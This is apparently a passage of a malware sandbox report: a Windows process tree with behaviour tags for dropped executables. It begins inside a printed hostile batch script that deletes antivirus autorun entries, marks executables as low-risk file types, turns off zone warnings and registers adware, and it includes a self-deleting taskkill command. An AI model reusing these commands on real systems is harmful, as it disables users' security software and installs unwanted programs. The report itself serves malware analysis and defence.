Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f ) else ( Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "DefaultFileTypeRisk" /t REG_DWORD /d "24914" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations" /v "LowRiskFileTypes" /t REG_SZ /d ".zip;.rar;.nfo;.txt;.exe;.bat;.com;.cmd;.reg;.msi;.htm;.html;.gif;.bmp;.jpg;.avi;.mpg;.mpeg;.mov;.mp3;.m3u;.wav;" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "HideZoneInfoOnProperties" /t REG_DWORD /d "1" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments" /v "SaveZoneInformation" /t REG_DWORD /d "2" /f /reg:64 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "DisplayName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}" /v "UninstallString" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -bootremove -uninst:RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK_Path" /t REG_SZ /d "%windir%\system32\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "HK64_Path" /t REG_SZ /d "%windir%\system32\rlls64.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "LD64_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg64.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "KS_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlls.dll" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config" /v "SV_Path" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlservice.exe" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy" /v "" /t REG_SZ /d "" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "ServiceName" /t REG_SZ /d "RelevantKnowledge" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "UninstURL" /t REG_SZ /d "http://www.relevantknowledge.com/confirmuninstall.aspx?siteid=2600&campaign_id=794" /f /reg:32 Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RevertPath" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:32 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "QHSafeTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Zillya Antivirus" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBAMTray" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SBRegRebootCleaner" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "IseUI" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "COMODO Internet Security" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "ClamWin" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Avira SystrayStartTrigger" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AVGUI.exe" /f /reg:64 Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 )5⤵
-
C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe"C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exeC:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe3⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 16084⤵
- Program crash
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exeC:\Users\Admin\Documents\nZTAvaJJHiZt8CpVom0PFy_o.exe3⤵
-
C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"3⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"4⤵
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe"5⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"4⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xcc,0xd0,0xd4,0xa8,0xd8,0x7ffd59ec4f50,0x7ffd59ec4f60,0x7ffd59ec4f705⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1616 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1660 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2108 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2660 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2668 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3336 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4372 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4476 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4960 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5228 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2464 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3644 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1572 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5376 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3252 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=4224 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2692 /prefetch:85⤵
- Enumerates system info in registry
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2692 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=5376 /prefetch:25⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4988 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4740 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:15⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4632 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4192 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2912 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5808 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1360 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1360 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5716 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1588 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5324 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3184 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5660 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4984 /prefetch:85⤵
-
C:\Users\Admin\Downloads\NPE.exe"C:\Users\Admin\Downloads\NPE.exe"5⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6168 /prefetch:85⤵
- Executes dropped EXE
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:15⤵
-
C:\Users\Admin\Downloads\NPE.exe"C:\Users\Admin\Downloads\NPE.exe"5⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=856 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6136 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5252 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5648 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5632 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6232 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6180 /prefetch:85⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1592,5518420776413658172,16764283896289326014,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5204 /prefetch:85⤵
-
C:\Users\Admin\Downloads\EmsisoftEmergencyKit.exe"C:\Users\Admin\Downloads\EmsisoftEmergencyKit.exe"5⤵
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" /select,"Start Emergency Kit Scanner.exe"6⤵
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6244 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 62445⤵
- Kills process with taskkill
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /C taskkill /F /PID 6244 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\WnyJD1JNbEGRSLlBiKgWSQPQ.exe"4⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /PID 62445⤵
- Kills process with taskkill
-
C:\Users\Admin\Documents\4efeRxQJJ12zwxNcmojml1Pu.exe"C:\Users\Admin\Documents\4efeRxQJJ12zwxNcmojml1Pu.exe"2⤵
-
